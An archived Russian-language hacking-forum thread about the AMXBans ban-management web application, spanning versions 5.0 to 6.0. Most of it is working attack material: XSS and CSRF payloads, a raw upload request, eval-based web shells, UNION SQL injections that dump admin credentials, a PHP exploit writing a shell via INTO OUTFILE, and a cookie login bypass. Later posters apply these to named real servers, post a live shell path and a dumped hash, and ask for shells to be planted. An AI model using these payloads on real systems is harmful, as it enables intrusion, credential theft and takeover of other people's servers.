Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

AMXBans

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> AMXBans
Имя
Сообщение << Старые топики   Новые топики >>
AMXBans - 2009-09-07 11:45:39.843333   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
AMXBans 5.0 by YoMama/LuX & lantz69

Site: http://www.amxbans.net/
Dork: allinurl:ban_list.php amxbans
Папки доступные на запись:
  • include (скрипт сам создает конфиг, который располагается в этой папке)
  • smarty/templates_c (скомпиленные шаблоны смарти)
  • tmp (здесь сохраняются залитые на сервак списки банов)

  • XSS
    /unavailable.php?message=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Необходимо: register_globals = On
    if ($_GET['msg'] == "frontend_disabled") { $message = lang("_ERRORAMXBANSDISABLED"); } else if ($_GET['msg'] == "setupfile_exists") { $message = lang("_ERRORSETUPPHP"); } else if ($_GET['msg'] == "magicquotes_off") { $message = lang("_ERRORMAGICQUOTES"); } //... $smarty-&gt;assign("message",$message); Подобные ошибки встречаются и в других скриптах. К примеру, /ban_details.php?ban_info[player_name]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    XSS (активная)
    /login.php?uid=%3Cscript%3Ealert(/xss/)%3C/script%3E
    /admin/log_search.php
    Необходимо: register_globals = On
    if(isset($_POST['uid'])){ $_POST['uid'] = secure($_POST['uid']); } //... if (isset($_POST['uid'])) { $uid = $_POST['uid']; } else if ( isset($_SESSION['uid']) ){ $uid = $_SESSION['uid']; } //... $add_log = mysql_query("INSERT INTO $config-&gt;logs VALUES ('', '$now', '".$_SERVER['REMOTE_ADDR']."', 'unknown', 'admin logins', '$uid failed to login')") or die (mysql_error()); Метод устранения:
    В начала файла include/functions.lang.php дописать
    function regGlobOff($array) { foreach($array as $k =&gt; $v) { unset($GLOBALS[$k]); } } error_reporting(0); regGlobOff($_POST); regGlobOff($_GET); regGlobOff($_COOKIE);
    Path disclosure
    Практически в каждом файле:
    // Start session session_start(); Вставляем в идентификатор сессии запрещенные символы и получаем
    Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /Library/WebServer/test/amxbans/ban_list.php on line 46 Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /Library/WebServer/test/amxbans/ban_list.php:46) in /Library/WebServer/test/amxbans/ban_list.php on line 46 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /Library/WebServer/test/amxbans/ban_list.php:46) in /Library/WebServer/test/amxbans/ban_list.php on line 46 Метод устранения:
    В каждом скрипте перед session_start поставить оператор подавления ошибок @

    CSRF
    Добавляет нового веб-админа с максимальными полномочиями. "Демо" сплойт:
    &lt;body onload="document.forms.admins.submit()"&gt; &lt;form name='admins' method='post' action='http://test/amxbans/admin/admins_levels.php'&gt; &lt;input type='hidden' name='sektion' value='webadmins'&gt; &lt;input type='text' name='username' value="test"&gt; &lt;input type='text' name='password' value="test"&gt; &lt;input type='text' name='level' value='1'&gt; &lt;input type='hidden' name='action' value="insert"&gt; &lt;/form&gt; Метод устранения:
    Добавить следующий код, например в include/accesscontrol.inc.php
    if( $_SERVER['REQUEST_METHOD'] == 'POST') if(!preg_match('!^http(s)?://' . preg_quote($_SERVER['HTTP_HOST']) . '!i', $_SERVER['HTTP_REFERER'])) exit;
    Заливка шелла
    /admin/import_bans.php
    Имя файла для заливки должно заканчиваться на .cfg, и его размер не должен привышать 45000 байт. Загружать шелл надо указав тип файла "text/plain". Шелл зальется в папку tmp с тем же именем.
    Пример:
    $nc localhost 80 POST /amxbans/admin/import_bans.php HTTP/1.1 User-Agent: Opera/10.00 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.0 Host: test Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en,ru;q=0.9,ja;q=0.8,fr;q=0.7,de;q=0.6,es;q=0.5,it;q=0.4,pt;q=0.3,pt-PT;q=0.2,nl;q=0.1,sv;q=0.1,nb;q=0.1,da;q=0.1,fi;q=0.1,pl;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://test/amxbans/admin/import_bans.php Cookie: amxbans=oRb%3Ad8578edf8458ce06fbc5bb76a58c5ca4%3A1%3A%3A971f14d9f928e6458ccf6e3d3cb13a54%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes; PHPSESSID=29d9830bde44023b1e1c2affc6d82324 Cookie2: $Version=1 Connection: Close TE: deflate, gzip, chunked, identity, trailers Content-Length: 566 Content-Type: multipart/form-data; boundary=----------sLuN8T5jVOiPkDnr0wuySS -------VOiPkDnr0wuySS Content-Disposition: form-data; name="submitted" true ------------sLuN8T5jVOiPkDnr0wuySS Content-Disposition: form-data; name="banlog"; filename="info.php.cfg" Content-Type: text/plain &lt;?php phpinfo(); ?&gt; ------------sLuN8T5jVOiPkDnr0wuySS Content-Disposition: form-data; name="ban_reason" ------------sLuN8T5jVOiPkDnr0wuySS Content-Disposition: form-data; name="ban_length" ------------sLuN8T5jVOiPkDnr0wuySS Content-Disposition: form-data; name="importit" import ------------sLuN8T5jVOiPkDnr0wuySS--



    Таблицы:
    amx_admins_servers
    amx_amxadmins
    amx_banhistory
    amx_banreasons
    amx_bans
    amx_levels
    amx_logs
    amx_serverinfo
    amx_webadmins (id, username, password, level, logcode) //password = md5 хеш

    Cookies:
    Ставится 1 кука с именем amxbans. Ее содержимое: oRb%3Ad8578edf8458ce06fbc5bb76a58c5ca4%3A1%3A%3Ac2b6a0f098280fc8f4795e33b58a77ed%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes
    $cook = explode(":", $_COOKIE["amxbans"]); $uid = $cook[0]; $pwd = $cook[1]; $lvl = $cook[2]; $uip = $cook[3]; $logcode = $cook[4]; $bans_add = $cook[5]; $bans_edit = $cook[6]; $bans_delete = $cook[7]; $bans_unban = $cook[8]; $bans_import = $cook[9]; $bans_export = $cook[10]; $amxadmins_view = $cook[11]; $amxadmins_edit = $cook[12]; $webadmins_view = $cook[13]; $webadmins_edit = $cook[14]; $permissions_edit = $cook[15]; $prune_db = $cook[16]; $servers_edit = $cook[17]; $ip_view = $cook[18];
    В сессию отлично пишется php код. Достаточно просто обратится к скрипту с параметром newlang. /ban_search.php?newlang=%3C?%20eval($_GET[c])?%3E
    Получим:
    lang|s:19:"&lt;? eval($_GET[c])?&gt;";uid|s:4:"test";pwd|s:32:"098f6bcd4621d373cade4e832627b4f6";uip|s:0:"";lvl|s:1:"1";userid|N;bans_add|s:3:"yes";bans_edit|s:2:"no";bans_delete|s:2:"no";bans_unban|s:2:"no";bans_import|s:2:"no";bans_export|s:2:"no";amxadmins_view|s:2:"no";amxadmins_edit|s:2:"no";webadmins_view|s:2:"no";webadmins_edit|s:2:"no";permissions_edit|s:2:"no";prune_db|s:2:"no";servers_edit|s:2:"no";ip_view|N; AMXBans работает только c magic_quotes = On !
    Post #: 1
    RE: AMXBans - 2009-09-07 17:55:03.283333   
    RED COMPANY

    Сообщений: 2
    Оценки: 0
    Присоединился: 2009-09-05 11:54:02.946666
    quote:

    magic_quotes = On

    Это не гуд:)
    А так было интересно почитать.. Самому лень и время нету искать, а читать люблю[sm=ab.gif]
    Post #: 2
    RE: AMXBans - 2009-11-15 15:39:47.710000   
    oRb

    Сообщений: 4044
    Оценки: 597
    Присоединился: 2007-03-28 18:45:06.630000
    Итак проект AMXBans ожил и 15 марта была зарелизена новая версия (5.1). Для тех кто не в курсе: AMXBans - это очень популярная система управления банами и админами на серверах CS 1.6. В новой версии не исправили старых багов, лишь добавили новых.

    XSS (register_globals=on)
    $resource = mysql_query("SELECT access, nickname FROM $config-&gt;amxadmins WHERE ashow = '1' ORDER BY access ASC") or die(mysql_error()); while($result = mysql_fetch_object($resource)) { $amxadmins_info = array( "access" =&gt; $result-&gt;access, "nickname" =&gt; $result-&gt;nickname ); $amxadmins_array[] = $amxadmins_info; } ... $smarty-&gt;assign("amxadmin",isset($amxadmins_array) ? $amxadmins_array : ""); /admins_list.php?amxadmins_array[999][nickname]=[XSS]

    XSS
    (так же актуально для предыдущей версии)
    $smarty-&gt;assign("this",$_SERVER['PHP_SELF']); /admin/add_ban.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    Path disclosure
    session_start(); ... if(mysql_num_rows($resource) == 0) { trigger_error("Can't find ban with given ID.", E_USER_NOTICE); } else { /ban_details_ex.php?bhid=-1
    или измененное значение сессии.

    SQL-injection
    $bhid = $_GET['bhid']; $resourcec = mysql_query("SELECT id, name, comment, email, addr, date FROM $config-&gt;amxcomments WHERE bhid =".mysql_escape_string($bhid)." ORDER BY date ASC") or die(mysql_error()); /ban_details_ex.php?bhid=-1+union+select+1,2,concat_ws(0x3a,username,password,logcode),4,5,6+from+amx_webadmins

    SQL-injection (register_globals=on)
    $where[] = "address != 'localhost:27000'"; $resource = mysql_query("SELECT * FROM $config-&gt;servers WHERE ".implode(" AND ",$where)." ORDER BY hostname ASC") or die (mysql_error()); /live.php?where[]=0+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+from+amx_webadmins–+

    Blind SQL-injection exploit
    Скуль присутствует в ban_details.php и ban_details_ex.php, только ее необходимость многие могли бы поставить под сомнение, тк выше уже была описана инъекция с выводом. Но если File_priv = y, тогда можно залить шелл.
    Разработчики добавили возможность комментировать баны, и чтобы банлист не спамили, они прикрутили каптчу. Вот только реализовали они ее хреново:
    $rand = mt_rand(1000000,9999999); $rand = base64_encode($rand); $rand = substr($rand, 0, 7).""; $rand = str_replace("J", "Z", $rand); $rand = str_replace("I", "Y", $rand); $rand = str_replace("j", "z", $rand); $rand = str_replace("i", "y", $rand); if(!isset($_POST[action]) && $_POST[action] != "insert"){ unset($_SESSION['code']); $_SESSION['code'] = "$rand"; } ... if($_POST['verify'] != $_SESSION['code']){ $url = "$config-&gt;document_root"; $delay = "5"; echo "Incorrect security code, please try again!"; if(isset($_GET["bhid"])) { $bhid = $_GET['bhid']; echo "&lt;meta http-equiv=\"refresh\" content=\"".$delay.";url=\"ban_details_ex.php?bhid=$bhid\"&gt;"; } exit(); } Т.е. если сразу постить, код капчи не сгенерируется и будет равен пустой строке, следовательно каптча - не помеха. Сама уязвимость:if ((isset($_POST['action'])) && ($_POST['action'] == "insert")) { if ($_SERVER['HTTP_CLIENT_IP']) { $user_ip = $_SERVER['HTTP_CLIENT_IP']; } else if ($_SERVER['HTTP_X_FORWARDED_FOR']) { $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else if ($_SERVER['REMOTE_ADDR']) { $user_ip = $_SERVER['REMOTE_ADDR']; } else { $user_ip = ""; } ... $name = $_POST['name']; $comment = $_POST['comment']; $email = $_POST['email']; $bhid=$_GET["bhid"]; $time = time(); $contact_flood=5*60; if(isset($_GET['bhid'])) { $bhid = $_GET["bhid"]; $sql = mysql_query("SELECT date FROM $config-&gt;amxcomments WHERE addr = '".$user_ip."' AND bhid = '".$bhid."' ORDER BY date DESC LIMIT 0, 1"); } Ну и сам простенький сплойт:
    &lt;?php $url = 'http://test/amxbans51/'; $text = '&lt;?php eval($_GET[c]);?&gt;'; $path = '/Library/WebServer/test/amxbans51/'; $file = 'demos/shell.php'; $postdata = http_build_query( array( 'action' =&gt; 'insert', 'verify' =&gt; "" ) ); $opts = array('http' =&gt; array( 'method' =&gt; 'POST', 'header' =&gt; "Content-type: application/x-www-form-urlencoded\r\n" ."CLIENT-IP: 0' union select '".addslashes($text)."' into outfile '".$path.$file."'#", 'content' =&gt; $postdata ) ); $context = stream_context_create($opts); @file_get_contents($url.'ban_details.php?bhid=-1', false, $context); echo "Check: ".$url.$file."\n"; ?&gt;
    ps1: если на сервере стоит AMXBans это железобетонно означает, что на сервере magic_quotes=on
    ps2: если не удастся найти пароль по хешу, можно составить куку.
    ps3: шелл прекрасно льется через /admin/demo.php
    Post #: 3
    RE: AMXBans - 2009-11-28 04:01:11.613333   
    Анoним

    Сообщений: 22
    Оценки: 0
    Присоединился: 2009-11-21 02:28:59.770000
    quote:

    CSRF
    Добавляет нового веб-админа с максимальными полномочиями. "Демо" сплойт:
    &lt;body onload="document.forms.admins.submit()"&gt;
    &lt;form name='admins' method='post' action='http://test/amxbans/admin/admins_levels.php'&gt;
    &lt;input type='hidden' name='sektion' value='webadmins'&gt;
    &lt;input type='text' name='username' value="test"&gt;
    &lt;input type='text' name='password' value="test"&gt;
    &lt;input type='text' name='level' value='1'&gt;
    &lt;input type='hidden' name='action' value="insert"&gt;

    как им воспользоваться? Объясни пожалуйста.
    </form>
    Post #: 4
    RE: AMXBans - 2009-11-28 04:17:54.623333   
    Анoним

    Сообщений: 22
    Оценки: 0
    Присоединился: 2009-11-21 02:28:59.770000
    И ещё вопрос.. Вот например получаю я имя админа и его хэш..
    Включаю программу passwordspro что бы расхэшировать.. Ввожу имя админа, хэш.. А вот сам тип хэширования какой ставить?? Просто MD5 или что-то другое?
    Post #: 5
    RE: AMXBans - 2009-11-28 10:47:49.960000   
    oRb

    Сообщений: 4044
    Оценки: 597
    Присоединился: 2007-03-28 18:45:06.630000

    quote:

    ORIGINAL: Анoним

    И ещё вопрос.. Вот например получаю я имя админа и его хэш..
    Включаю программу passwordspro что бы расхэшировать.. Ввожу имя админа, хэш.. А вот сам тип хэширования какой ставить?? Просто MD5 или что-то другое?

    md5 (написано в первом посте). Но можно и не брутить, а составить валидные куки.

    Про CSRF советую почитать здесь: http://www.xakep.ru/magazine/xa/115/044/1.asp
    Post #: 6
    RE: AMXBans - 2009-11-28 19:46:18.450000   
    Анoним

    Сообщений: 22
    Оценки: 0
    Присоединился: 2009-11-21 02:28:59.770000
    Благодарю! Всё получилось! :)
    Post #: 7
    RE: AMXBans - 2009-12-07 16:24:07.646666   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    quote:

    CSRF Добавляет нового веб-админа с максимальными полномочиями. "Демо" сплойт: &lt;body onload="document.forms.admins.submit()"&gt; &lt;form name='admins' method='post' action='http://test/amxbans/admin/admins_levels.php'&gt; &lt;input type='hidden' name='sektion' value='webadmins'&gt; &lt;input type='text' name='username' value="test"&gt; &lt;input type='text' name='password' value="test"&gt; &lt;input type='text' name='level' value='1'&gt; &lt;input type='hidden' name='action' value="insert"&gt;


    Народ подскажите плз поподробней как пользоваться ! Настроил скрипт залил на http сервер вроде все работает только амдин не добавляеться.
    Post #: 8
    RE: AMXBans - 2009-12-09 16:27:27.740000   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    АУУУ… ну народ plz подскажите как кешировать пароли ??
    Post #: 9
    RE: AMXBans - 2009-12-11 18:31:09.730000   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    на каком языке сплойты написаны ?
    Post #: 10
    RE: AMXBans - 2009-12-11 20:22:54.066666   
    oRb

    Сообщений: 4044
    Оценки: 597
    Присоединился: 2007-03-28 18:45:06.630000

    quote:

    ORIGINAL: trayverr

    АУУУ… ну народ plz подскажите как кешировать пароли ??

    чего чего? оО

    quote:

    ORIGINAL: trayverr

    на каком языке сплойты написаны ?

    эмм, html, php…
    Post #: 11
    RE: AMXBans - 2009-12-13 01:46:46.173333   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    Уважаемый oRb прошу Вас написать поподробней как пользоваться сплойтОм CRF

    bоdу оnlоаd="document.forms.admins.submit()">
    <form name='admins' method='post' action='http://test/amxbans/admin/admins_levels.php'>
    <input type='hidden' name='sektion' value='webadmins'>
    <input type='text' name='username' value="test">
    <input type='text' name='password' value="test">
    <input type='text' name='level' value='1'>
    <input type='hidden' name='action' value="insert">
    </form>

    редактируем исходник, вводим адрес амхбанс, вводим логин нового админа, вводим пароль нового админа. Далее сохраняем в формате php и льем на http сервер и заходим через браузер на данный php. Попробовал все по данному алгоритму, заходит, только не понимаю что делать дальше, как открыть страницы с редактированием веб амдинов и др, подскажи как это сделать. спасибо.
    Post #: 12
    RE: AMXBans - 2009-12-13 10:50:50.333333   
    oRb

    Сообщений: 4044
    Оценки: 597
    Присоединился: 2007-03-28 18:45:06.630000
    trayverr, прочтите статью http://www.xakep.ru/magazine/xa/115/044/1.asp
    Тогда вы поймете, что без участия самого админа из этой атаки ничего не выжать.
    Post #: 13
    RE: AMXBans - 2009-12-14 21:07:27.806666   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    тоесть админ будучи авторизированным просто должен зайти на страницу с кодом ? спасибо за информацию !!
    Post #: 14
    RE: AMXBans - 2009-12-24 03:43:18.413333   
    BlinccAttack

    Сообщений: 136
    Оценки: 0
    Присоединился: 2009-09-12 03:23:33.973333
    Я немного не понял как залить шелл.Вот например у меня есть Wso2 как его залить через тот сплойт?
    Post #: 15
    RE: AMXBans - 2010-01-05 11:45:07.990000   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    да хотелось бы поподробней узнать про заливку шелла….
    Post #: 16
    RE: AMXBans - 2010-01-05 16:06:02.430000   
    betmansuperman

    Сообщений: 3
    Оценки: 0
    Присоединился: 2009-12-30 19:21:24.333333
    вот куки чё с ними дальше делать
    fusion_visited=yes; PHPSESSID=10a169600eb05ebc0ccd3d84f0b08ffd; cwsmf=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22106461%22%3Bi%3A1%3Bs%3A40%3A%22e0cc437d536ad603675721e2645c18386af92a99%22%3Bi%3A2%3Bi%3A1451736989%3Bi%3A3%3Bi%3A2%3B%7D
    Post #: 17
    RE: AMXBans - 2010-01-05 17:22:14.343333   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333

    quote:

    ORIGINAL: betmansuperman

    вот куки чё с ними дальше делать
    fusion_visited=yes; PHPSESSID=10a169600eb05ebc0ccd3d84f0b08ffd; cwsmf=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22106461%22%3Bi%3A1%3Bs%3A40%3A%22e0cc437d536ad603675721e2645c18386af92a99%22%3Bi%3A2%3Bi%3A1451736989%3Bi%3A3%3Bi%3A2%3B%7D

    вставить вместо своих
    Post #: 18
    RE: AMXBans - 2010-01-05 20:36:32.483333   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    народ залейте ктонибудь шелл на http://77.37.255.115/amxbans
    Post #: 19
    RE: AMXBans - 2010-01-10 01:19:25.766666   
    lososinus

    Сообщений: 6
    Оценки: 0
    Присоединился: 2009-06-03 23:14:20.566666
    http://77.37.255.115/amxbans/demos/3m4z.php он там уже с неделю весит !
    Post #: 20
    RE: AMXBans - 2010-01-10 19:20:07.260000   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000

    quote:

    ORIGINAL: lososinus

    http://77.37.255.115/amxbans/demos/3m4z.php он там уже с неделю весит !

    Можешь плз залить еще раз, 3m4z.php – админ удалил этот шелл ((
    Post #: 21
    RE: AMXBans - 2010-01-10 20:51:57.853333   
    lososinus

    Сообщений: 6
    Оценки: 0
    Присоединился: 2009-06-03 23:14:20.566666
    quote:

    ORIGINAL: trayverr

    quote:

    ORIGINAL: lososinus

    http://77.37.255.115/amxbans/demos/3m4z.php он там уже с неделю весит !

    Можешь плз залить еще раз, 3m4z.php – админ удалил этот шелл ((

    тебе что статьи мало, там же все до мелочей описано !вот инъекция
    http://77.37.255.115/amxbans/ban_details.php?bhid=-1+union+select+1,2,concat_ws%280x3a,username,password,logcode%29,4,5,6+from+amx_webadmins
    Post #: 22
    RE: AMXBans - 2010-01-12 11:19:57.060000   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    извини, я не хакер, я так понял это закешированные пароли веб админов ?
    Post #: 23
    RE: AMXBans - 2010-01-12 19:21:18.706666   
    blonx

    Сообщений: 1150
    Оценки: 0
    Присоединился: 2006-04-01 03:28:42
    username:password(MD5):logcode                                                                                                                                      St.:32a9b9572ae690a8513799ea41da7cf0:a72a4700ceea21c93a751c7ee76e1e25
    Post #: 24
    RE: AMXBans - 2010-01-15 05:16:46.570000   
    Sensation

    Сообщений: 1
    Оценки: 0
    Присоединился: 2010-01-15 05:13:13.150000
    quote:

    http://77.37.255.115/amxbans/ban_details.php?bhid=-1+union+select+1,2,concat_ws%280x3a,username,password,logcode%29,4,5,6+from+amx_webadmins


    Думаю нужно обновить систему на более свежую и все будет ок =)
    Post #: 25
    RE: AMXBans - 2010-01-16 00:45:28.953333   
    trayverr

    Сообщений: 11
    Оценки: 0
    Присоединился: 2009-12-07 16:20:22.610000
    ставь пароль подлиннее и посложнее, тогда пароль хрен расшифруешь…
    Post #: 26
    RE: AMXBans - 2010-01-16 02:18:19.646666   
    S00pY

    Сообщений: 785
    Оценки: 0
    Присоединился: 2007-04-14 20:44:05.376666

    quote:

    ORIGINAL: trayverr

    ставь пароль подлиннее и посложнее, тогда пароль хрен расшифруешь…

    Куку можно пихнуть….
    Обрамить кавычками параметр нужно.
    Post #: 27
    RE: AMXBans - 2010-03-15 01:16:11.760000   
    3m4z

    Сообщений: 1
    Оценки: 0
    Присоединился: 2010-03-15 00:13:16.370000
    _http://cs.playground.org.ua/bans/ban_details_a_serv_is.php?bhid=-1+union+select+1,2,3,4,5,6+from+amx_amxadmins
    Post #: 28
    RE: AMXBans - 2010-07-04 23:18:11.820000   
    killrO_o

    Сообщений: 54
    Оценки: 0
    Присоединился: 2010-04-01 03:19:51.716666
    Дайте пожалуйста ссылку на статью по заливке шелла!) Заранее спасибо!
    Post #: 29
    RE: AMXBans - 2010-07-23 22:07:16.506666   
    justnike90

    Сообщений: 311
    Оценки: 0
    Присоединился: 2010-07-22 22:42:27.946666
    пасиб!
    Post #: 30
    RE: AMXBans - 2010-08-18 13:05:00.870000   
    StepanRazin1989

    Сообщений: 4
    Оценки: 0
    Присоединился: 2010-08-18 12:49:27.080000
    Опа, огромный респект
    Post #: 31
    RE: AMXBans - 2010-11-19 02:23:15.723333   
    killrO_o

    Сообщений: 54
    Оценки: 0
    Присоединился: 2010-04-01 03:19:51.716666
    AMXBANS 6.0.0
    Вход под администратором:
    /include/access.inc.php
    PHP код:
    if(isset($_COOKIE[$config-&gt;cookie]) && $_SESSION["loggedin"]==false) { $cook = explode(":", $_COOKIE[$config-&gt;cookie]); $sid = $cook[0]; if(!$_SESSION["lang"]) $_SESSION["lang"]=$cook[1]; $mysql = mysql_connect($config-&gt;db_host,$config-&gt;db_user,$config-&gt;db_pass) or die (mysql_error()); $resource = mysql_select_db($config-&gt;db_db) or die (mysql_error()); $query = mysql_query("SELECT id,username,level,email FROM `".$config-&gt;db_prefix."_webadmins` WHERE logcode='".$sid."' LIMIT 1") or die (mysql_error()); if(mysql_num_rows($query)) { while($result = mysql_fetch_object($query)) { $_SESSION["uid"]=$result-&gt;id; $_SESSION["uname"]=$result-&gt;username; $_SESSION["email"]=$result-&gt;email; $_SESSION["level"]=$result-&gt;level; $_SESSION["sid"]=session_id(); $_SESSION["loggedin"]=true; }
    Экспл:

    В куки добавляем: ' or id=1 -- :123
    Post #: 32
    RE: AMXBans - 2010-11-19 17:39:03.653333   
    GoMore

    Сообщений: 64
    Оценки: 0
    Присоединился: 2010-04-14 21:48:39.800000
    Oo n1 sps!
    Post #: 33
    RE: AMXBans - 2010-12-21 07:22:42.256666   
    noPE7

    Сообщений: 1
    Оценки: 0
    Присоединился: 2010-12-21 07:16:18.546666
    Некоторые ошибка на этом сайте: http://bans.iplay.bg/ ?
    Post #: 34
    Страниц:  [1]
    Все форумы >> [Уязвимости] >> AMXBans







    Связаться:
    Вопросы по сайту / xakep@glc.ru

    Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.